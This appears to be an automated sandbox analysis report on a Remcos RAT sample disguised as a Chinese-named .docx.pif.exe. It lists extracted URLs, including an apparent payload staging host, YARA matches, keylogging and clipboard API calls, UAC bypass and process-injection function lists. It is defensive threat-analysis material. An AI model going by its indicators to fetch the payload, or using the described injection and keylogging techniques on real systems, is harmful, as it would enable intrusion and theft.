Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: colorcpl.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: colorcpl.exe, 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: xkn.exe, 00000016.00000002.1319214441.000001EC81C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.0000000026652000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1392779821.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.00000000265F6000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.0000000027650000.00000004.00000020.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1335815868.0000000002326000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.00000000276AC000.00000004.00000020.00020000.00000000.sdmp, drbdmeyP.pif, drbdmeyP.pif, 00000003.00000001.1257794553.000000000043B000.00000040.00000001.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000000.1257373309.0000000000416000.00000002.00000001.01000000.00000005.sdmp, drbdmeyP.pif.0.dr	String found in binary or memory: http://www.pmail.com
Source: xkn.exe, 00000016.00000002.1319214441.000001EC81CA1000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000016.00000002.1319214441.000001EC81C63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: SystemSettingsAdminFlows.exe, 00000028.00000002.3692868865.000002F388E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.localP
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.0000000000870000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wcmanagers.com/
Source: drbdmeyP.pif, 00000003.00000001.1257794553.00000000004CC000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wcmanagers.com/Er9/233_Pyemdbrdpps
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wcmanagers.com/Er9/233_Pyemdbrdpps03
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.000000000087A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wcmanagers.com:443/Er9/233_PyemdbrdppsWz

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443

Source: unknown

HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49700 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0458A2B8 SetWindowsHookExA 0000000D,0458A2A4,00000000

31_2_0458A2B8

Contains functionality for read data from the clipboard

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0458B70E OpenClipboard,GetClipboardData,CloseClipboard,

31_2_0458B70E

Contains functionality to modify clipboard data

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_045968C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

31_2_045968C1

Contains functionality to read the clipboard data

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0458B70E OpenClipboard,GetClipboardData,CloseClipboard,

31_2_0458B70E

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0458A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

31_2_0458A3E0

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\gaban\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0459C9E2 SystemParametersInfoW,

31_2_0459C9E2

Reads the Security eventlog

Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\colorcpl.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029981B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_029981B8
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299C7B4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_0299C7B4
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299C724 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_0299C724
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299A524 GetModuleHandleW,GetProcAddress,NtOpenProcess,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,NtWriteVirtualMemory,GetModuleHandleW,GetProcAddress,NtCreateThreadEx,CloseHandle,	0_2_0299A524
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997A94 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,	0_2_02997A94
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299DA24 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,	0_2_0299DA24
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299C898 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_0299C898
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299D9A4 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,	0_2_0299D9A4
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997944 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	0_2_02997944
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997E14 LoadLibraryExA,GetModuleHandleA,GetProcAddress,NtFlushInstructionCache,FreeLibrary,	0_2_02997E14
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	0_2_02997CC8
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029981B6 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_029981B6
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299C6AC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_0299C6AC
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299C7B2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_0299C7B2
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997A92 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,	0_2_02997A92
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029979D8 GetModuleHandleW,GetProcAddress,NtProtectVirtualMemory,	0_2_029979D8
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997942 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	0_2_02997942
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	8_2_00007FF64B578114
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	8_2_00007FF64B58BCF0
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	8_2_00007FF64B5788C0
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	8_2_00007FF64B577FF8
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B57898C NtQueryInformationToken,	8_2_00007FF64B57898C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	8_2_00007FF64B563D94
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	8_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,	8_2_00007FF64B5789E4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	10_2_00007FF64B578114
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	10_2_00007FF64B58BCF0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	10_2_00007FF64B5788C0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	10_2_00007FF64B577FF8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B57898C NtQueryInformationToken,	10_2_00007FF64B57898C
